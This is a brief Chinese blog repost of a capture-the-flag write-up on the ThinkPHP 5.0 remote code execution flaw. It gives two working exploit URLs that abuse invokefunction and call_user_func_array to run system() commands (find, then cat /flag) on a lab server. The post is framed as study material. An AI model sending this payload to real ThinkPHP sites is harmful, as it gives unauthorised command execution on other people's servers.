ThinkPHP 5.0 版本存在getshell漏洞 php_rce
Posted clqnotes
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ThinkPHP 5.0 版本存在getshell漏洞 php_rce相关的知识,希望对你有一定的参考价值。
查找flag:http://111.198.29.45:45747/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
payload:http://111.198.29.45:45747/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag
参考自:https://blog.csdn.net/weixin_45425482/article/details/103709085
学习用途
以上是关于ThinkPHP 5.0 版本存在getshell漏洞 php_rce的主要内容,如果未能解决你的问题,请参考以下文章
ThinkPHP V5(漏洞解析及利用)及tornado知识点